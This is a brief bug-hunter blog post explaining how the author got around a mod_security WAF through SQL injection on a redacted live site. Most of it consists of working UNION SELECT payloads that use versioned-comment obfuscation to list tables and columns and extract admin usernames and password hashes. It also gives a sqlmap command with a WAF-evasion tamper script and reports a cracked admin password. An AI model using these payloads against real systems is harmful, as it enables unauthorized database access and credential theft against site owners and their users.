SQL Injection — WAF Bypass!

After getting lots of requests for bypass WAF in my DMs about my previous writeup. I decided to make writeup. “Knowledge is free”. Without any delay let’s start.

I hope you guys are know about SQL Injection and their type. So, in this writeup I’ll tell you How I bypassed mod_security WAF and get full access of database.

I put single quote after number and I got an error. Error was like some web page’s element vanished from web page. I was damn sure that there is possible to perform SQL Injection.

I’m skipping basic part, how to find exact columns in database. There were 10 columns in their database.

Query 1: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,6,7,8,9,10 — +

Query 2: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,database(),7,8,9,10 — +

Query 3: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(table_name),7,8,9 from /*!00000information_schema.tables*/ /*!00000where*/ /*!00000table_schema*/=database() — +

Query 4: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(column_name),7,8,9 from /*!00000information_schema.columns*/ /*!00000where*/ /*!00000table_name*/=’admin’ — +

Query 6: https://redacted.com/xx/leads_details.php?id=-3 /*!00000union select*/ 1,2,3,4,5,group_concat(Username,0x0a,password,0x0a,name),7,8,9 from admin — +

Username is admin, name is dev and password were in hash, I found that hash type of MD5 and I cracked it. it was admin’s name like this “dev456”

This is manual method. You can also use automation (sqlmap -u “site.com/details.php?id=1” –dbs — banner –tamper=modsecurityzeroversioned) you can use randomcase script too.

That’s it folks! I hope you like this. “keep hunting, keep sharing!

Instagram: th3.d1p4k

Twitter: Dipak Panchal

Bug hunter | CCSE